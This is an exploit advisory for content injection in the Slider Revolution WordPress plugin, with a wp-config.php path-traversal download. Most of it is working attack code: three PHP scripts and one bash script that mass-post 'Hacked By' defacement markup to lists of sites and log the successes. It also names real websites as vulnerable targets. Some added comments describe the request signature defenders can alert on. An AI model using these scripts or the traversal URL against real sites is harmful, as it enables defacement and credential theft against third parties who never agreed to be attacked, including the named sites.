############################################################################################
# Exploit Title : WordPress 5.1.1 Slider Revolution 4.6.5 UpdateCaptionsCSS Remote Content Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Published Date : 20/03/2019
# Vulnerability Discovered Date : 2013 - 2014
# Vendor Homepage : revolution.themepunch.com - codecanyon.net
# Software Information Link : codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
# Software Affected Versions : 4.x.x - 5.x.x with Software 4.6.5 and lower versions
# Software Price Type : Paid Download - 26$
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
CWE-74: Improper Neutralization of Special Elements in
Output Used by a Downstream Component ('Injection')
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Cyberizm Reference Link : cyberizm.org/cyberizm-wordpress-revslider-get-caption-css-exploit.html
############################################################################################
# Description about Software :
***************************
Slider Revolution (Revolution Slider) is an innovative, responsive WordPress Slider Plugin that displays your content the
beautiful way. Whether it’s a Slider, Carousel, Hero Image or Video Scene for best conversion rates or even a whole Front Page,
the visual, drag & drop editor will let you tell your own stories in no time! Desktop or mobile device!
Note : This exploit was used in the wild in 2014 - 2015, but it was not shared in much detail. That's why I made it public.
############################################################################################
# Impact :
***********
The software constructs all or part of a command, data structure, or record using externally-influenced input from an
upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is
parsed or interpreted when it is sent to a downstream component. Here this is referred to as content injection.
############################################################################################
# Explanation for Vulnerability :
********************************
# Vulnerability :
************
/wp-content/plugins/revslider/revslider_admin.php
/wp-admin/admin-ajax.php
"action" => "revslider_ajax_action",
"client_action" => "update_captions_css",
# Vulnerability Message :
*************************
{"success":false,"message":"Wrong request"}
# Vulnerability Response for Successful Exploitation :
*****************************************
{"success":true,"message":"","data":"
# Directory File Destination :
************************
/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
# Vulnerable Source Code :
************************
232. $action = self::getPostGetVar("client_action");
233. $data = self::getPostGetVar("data");
...
301. case "get_captions_css":
302. $contentCSS = $operations->getCaptionsContent();
303. self::ajaxResponseData($contentCSS);
...
305. case "update_captions_css":
306. $arrCaptions = $operations->updateCaptionsContentData($data);
307. self::ajaxResponseSuccess("CSS file saved
succesfully!",array("arrCaptions"=>$arrCaptions))
# Database Configuration File Download :
************************************
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Information About the MySQL Database Configuration File =>
****************************************************
/** The name of the database for WordPress */
define('DB_NAME', '');
/** MySQL database username */
define('DB_USER', '');
/** MySQL database password */
define('DB_PASSWORD', '');
/** MySQL hostname */
define('DB_HOST', '');
Note : Use Auto PHP and Bash Exploiter to use this Vulnerability.
############################################################################################
# Content Injection PHP Exploiter 1:
********************************
<b>..::|| Wordpress Revslider UpdateCaptionsCSS GetCaptionsCSS Content Injection Exploiter ||::..</b>
<?php
/*
[#]Coded By : KingSkrupellos
[#]www.cyberizm.org
*/
// NOTE(review): a browser form collects one site URL per line and, for each
// one, replays the unauthenticated admin-ajax.php request documented in the
// "Vulnerability" section of this page. The server-side signal to alert on is
// a POST to /wp-admin/admin-ajax.php carrying action=revslider_ajax_action and
// client_action=update_captions_css from a client that presents no WordPress
// session (no cookies or credentials are sent below); the marker text placed
// in "data" is what a site owner would find in the CSS served back by
// client_action=get_captions_css.
//======================================================
// Error reporting and the execution time limit are switched off, so any
// failure of the curl / file_get_contents calls below is silent.
@error_reporting(0);
@set_time_limit(0);
//======================================================
echo'<form method="post">
<textarea name="s" cols="50" rows="13" ></textarea><br>
<input type="submit" name="g" value="GO" />
</form>';
//=======================================================
// Runs only on submit with a non-empty list. The textarea is split on CRLF
// only and each entry is trimmed, so an LF-separated list is one single URL.
if(isset($_POST['g']) and !empty($_POST['s'])){
$urls = explode("\r\n",$_POST['s']);
foreach($urls as $url){
$url = trim($url);
// POST body read by the plugin's ajax dispatcher ("action", "client_action",
// "data" — compare the getPostGetVar() calls in the source excerpt above).
// "data" is the value handed to updateCaptionsContentData().
$post = array("action" => "revslider_ajax_action",
"client_action" => "update_captions_css",
"data" => "<h2>Hacked By KingSkrupellos Cyberizm Digital Security Army<br>:)<br>");
// The same URL serves the POST and the later read-back. Its query string says
// client_action=get_captions_css while the body says update_captions_css;
// which one the plugin honours depends on getPostGetVar()'s lookup order,
// which the source excerpt on this page does not show.
$site = $url."/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL, $site);
curl_setopt($ch,CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
curl_setopt($ch,CURLOPT_TIMEOUT,30);
// TLS certificate verification is disabled for this request.
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);
// The POST response is captured in $cn but never examined; the handle is not
// closed either. Success is judged solely by the plain GET below.
$cn = curl_exec($ch);
// Read-back via GET. The fetched CSS is searched case-insensitively for the
// word "hacked" (eregi), so any pre-existing occurrence of that word in the
// served CSS is also reported as "done".
$fcn = @file_get_contents($site);
if(eregi('hacked',$fcn)){
echo "<b>[#] $url : done <a href=\"$site\">HERE</a></b><br>";
}else{
echo"[!]$url : failed<br>";
}
}
}
//========================= \!/ Mission Accomplished \!/ ====================================================//
?>
############################################################################################
# Content Injection PHP Exploiter 2 :
*********************************
<?php
// Console banner.
echo "\n+-------------------------------------------+\n";
echo "| Cyberizm Digital Security Army |\n";
echo "| www.cyberizm.org |\n";
echo "+-------------------------------------------+\n";
// The target list is read from the file named by the first CLI argument. The
// @ hides a missing or unreadable file; $gv is then false, and explode() below
// yields a single empty entry (reported as "Total site loaded : 1").
$gv=@file_get_contents($argv[1]);
// Split on CRLF only; an LF-separated file is treated as one entry.
$exv=explode("\r\n",$gv);
echo "\n\t Total site loaded : ".count($exv)."\n\n";
// dr() is declared further down in this file; PHP hoists unconditional
// top-level function declarations, so the call resolves.
foreach($exv as $url){
echo "\n[+]Scaning : $url \n";
dr($url);
}
// Sends the update_captions_css POST to one site, then fetches
// get_captions_css from it and checks the served CSS for the marker text.
// $site is the entry as read from the list (scheme and host). Messages
// reference $site; the file read-back and the finish.txt log use $path.
function dr($site){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "".$site."/wp-admin/admin-ajax.php");
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_POST, 1);
// Multipart POST body: the three fields the plugin's ajax dispatcher reads
// (see the source excerpt above). "data" carries the marker block that the
// plugin then serves as caption CSS.
curl_setopt($ch, CURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action", "client_action" => "update_captions_css", "data" => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by KingSkrupellos Cyberizm Digital Security Team<p style='color: transparent'>"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
// TLS peer and host verification are both disabled.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$result = curl_exec($ch);
// Success of the POST is inferred from the response containing "true"
// (compare the {"success":true,...} reply shown earlier on this page). There
// are no braces, so only the $path assignment on the next line is conditional
// on this test; everything after it runs regardless.
if (eregi('true', $result))
$path="$site/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
// Read-back of the served CSS; warnings are suppressed, so a failed fetch
// leaves $gett false and the match below simply fails.
$gett=@file_get_contents($path);
if(preg_match('/Hacked by KingSkrupellos Cyberizm Digital Security Army/',$gett)){
echo "\n[+]Exploit Done \n[+]shell : $path \n\n ";
// Matching read-back URLs are appended to finish.txt in the working
// directory. $path already ends in the admin-ajax query string, so the
// admin-ajax suffix appears twice in each written line.
$fo = fopen("finish.txt","a+");
$r = fwrite($fo,"".$path."/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css\r\n");
fclose($fo);
} else {
echo "| ".$site . " : Not Revslider \n\n";
}
curl_close($ch);
}
echo "\n[-]Exploit Fail \n\n";
}
}
?>
############################################################################################
# Content Injection Bash Exploiter 3 :
*********************************
#!/bin/bash
#coded = IBT
# SS: sends the update_captions_css multipart POST to one host ($1, given
# without a scheme; http:// is hard-coded). The "data" field is the letter
# "x" followed by the marker block that Lengkap stores in tmp/s.txt. The
# response is written to tmp/resp.txt and is not inspected anywhere in this
# script; success is decided later by CD's read-back.
SS(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/resp.txt \
-H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-H "Accept-Language: en-us,en;q=0.5" \
-H "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" \
-F "client_action=update_captions_css" \
-F "action=revslider_ajax_action" \
-F "data=x$(cat tmp/s.txt)" \
--request POST "http://${1}/wp-admin/admin-ajax.php"
}
# CD: read-back check. Fetches get_captions_css for host $1 into tmp/cd.txt
# and greps it case-insensitively for the marker. Messages use the global
# $urlnya set by Exp rather than $1. The `continue` below sits inside a
# function, not a loop; whether it skips to the next target of Exp's loop
# depends on the bash version — presumably intended as "skip this host".
CD(){
if [ -f tmp/cd.txt ];then
# Presumably removes a stale result so an earlier hit cannot be re-read.
rm -f tmp/cd.txt
fi
curl --silent --max-time 10 --connect-timeout 10 "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css" -o tmp/cd.txt
if [ ! -f tmp/cd.txt ];then
echo "--> $urlnya : not vuln"
continue
fi
# grep exit status: 0 means the marker is present in the served CSS.
cat tmp/cd.txt | grep -i "KingSkrupellos" > /dev/null;cd=$?
if [ $cd -eq 0 ];then
echo "--> ${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css : exploit success"
# Hits are appended to success.txt in the working directory.
echo "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css" >> success.txt
else
echo "--> $urlnya : exploit failed"
fi
}
# CV: presence check. A GET to admin-ajax.php with only
# action=revslider_ajax_action is fetched into tmp/cv.txt. The script assumes
# the plugin's dispatcher answers with the text "wrong ajax action:" when it is
# installed, so grep status 1 (text absent) is reported as "not vuln". As in
# CD, the `continue` statements are inside a function rather than a loop and
# whether they affect Exp's loop depends on the bash version; messages use the
# global $urlnya rather than $1.
CV(){
if [ -f tmp/cv.txt ];then
rm -f tmp/cv.txt
fi
curl --silent --max-time 10 --connect-timeout 10 "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action" -o tmp/cv.txt
if [ ! -f tmp/cv.txt ];then
echo "--> $urlnya : not vuln"
continue
fi
# grep exit status: 1 means the dispatcher string was not found.
cat tmp/cv.txt | grep "wrong ajax action:" > /dev/null;cv=$?
if [ $cv -eq 1 ];then
echo "--> $urlnya : not vuln"
continue
else
echo "--> $urlnya : found revslider"
fi
}
# Exp: main loop over the target list. $list is the path entered at the
# prompt at the bottom of the script. Each entry produced by word-splitting
# `cat $list` is stripped of a leading http:// or https:// and of doubled
# slashes, de-duplicated against load.txt, then passed through CV, SS and CD
# in turn.
Exp(){
for url in `cat $list`
do
urlnya=$(echo $url | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | awk '{gsub("//","/")}1' | awk '{gsub("//","/")}1')
if [ ! -f load.txt ];then
touch load.txt
fi
# Substring match against load.txt, so a host that is contained in an
# earlier entry is also treated as already processed.
cat load.txt | grep "$urlnya" > /dev/null;ccl=$?
if [ $ccl -eq 1 ];then
echo $urlnya >> load.txt
else
# Already processed once according to load.txt.
# To process it again, delete load.txt.
continue
fi
echo "--> $urlnya : check"
CV $urlnya
SS $urlnya
CD $urlnya
done
}
# Lengkap ("complete" in Indonesian): entry point. Exits if the target list
# file does not exist, creates tmp/ if needed, writes the marker block to
# tmp/s.txt once (an existing tmp/s.txt is left untouched), then runs Exp.
Lengkap(){
if [ ! -f $list ];then
echo "[!] $list not exist"
exit
fi
if [ ! -d tmp ];then
mkdir tmp
fi
if [ ! -f tmp/s.txt ];then
# The heredoc body is the exact "data" payload that SS posts (prefixed with "x").
cat > tmp/s.txt <<_script
<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by KingSkrupellos Cyberizm Digital Security Army<p style='color: transparent'>
_script
fi
Exp
}
# Prompt for the path of the target list file, then run the whole flow.
read -p "[+] Enter list target = " list
Lengkap
############################################################################################
# Content Injection PHP Exploiter 4 :
*********************************
<?php
// Single-request variant: the same three-field POST body as the other
// listings on this page, sent once to a hard-coded http://localhost. The
// response is captured in $data and never inspected, and no read-back of
// get_captions_css is performed.
$post = array
(
"action" => "revslider_ajax_action",
"client_action" => "update_captions_css",
"data" => "<marquee>Hacked By KingSkrupellos Cyberizm Digital Security Army</marquee>"
);
$ch = curl_init ("http://localhost/wp-admin/admin-ajax.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
// TLS peer and host verification are both disabled.
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
?>
############################################################################################
# Example Vulnerable Sites :
*************************
[+] filature-lille.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
[+] daniperezrun.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
[+] bilateralsolutions.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
[+] blog.acquaesapone.it/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
[+] new.med.com.do/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
[+] en.neural.co.jp/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
############################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
############################################################################################